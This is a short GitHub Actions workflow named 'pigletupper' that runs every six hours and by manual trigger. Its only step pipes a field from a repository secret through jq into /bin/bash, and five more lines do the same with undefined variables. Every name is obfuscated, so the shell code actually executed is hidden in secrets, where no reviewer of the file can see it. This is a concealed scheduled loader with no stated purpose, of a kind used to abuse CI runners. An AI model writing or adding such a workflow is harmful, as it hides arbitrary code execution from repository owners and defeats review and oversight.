name: pigletupper

on:
  workflow_dispatch:
  schedule:
    - cron: '13 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: pigletupper
        env:
          ttn9: ${{ secrets.ttn9 }}
        run: |
          echo $ttn9 | jq -r .vc0965 | /bin/bash
          echo $xdun65949 | jq -r .s30 | /bin/bash
          echo $ktz13 | jq -r .nzu397 | /bin/bash
          echo $xblt97713 | jq -r .qlf29 | /bin/bash
          echo $iruw3092 | jq -r .kin375 | /bin/bash
          echo $rury80 | jq -r .l45 | /bin/bash

